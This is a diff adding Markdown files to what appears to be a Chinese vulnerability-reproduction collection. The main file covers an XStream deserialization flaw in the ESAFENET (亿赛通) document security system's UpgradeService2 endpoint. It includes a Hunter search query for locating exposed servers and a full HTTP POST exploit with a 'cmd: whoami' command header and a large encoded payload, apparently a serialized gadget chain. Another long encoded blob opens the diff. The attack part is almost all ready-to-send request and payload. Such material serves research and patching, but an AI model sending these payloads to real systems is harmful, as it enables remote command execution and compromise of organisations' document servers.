FLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706605450577-fee88eb3-9b29-44f0-875e-f77a2d5e47fb.png](./img/sdMScspjjjqriDzh/1706605450577-fee88eb3-9b29-44f0-875e-f77a2d5e47fb-318399.png)
+
+
+
+> 更新: 2024-04-20 22:01:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ig36qq281gfbonwm>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统UpgradeService2存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UpgradeService2存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..0dedf62
--- /dev/null
+++ b/亿赛通电子文档安全管理系统UpgradeService2存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统UpgradeService2存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统UpgradeService2存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/WvmVMAPZqfXIaEL3/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-683030.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/UpgradeService2 HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPF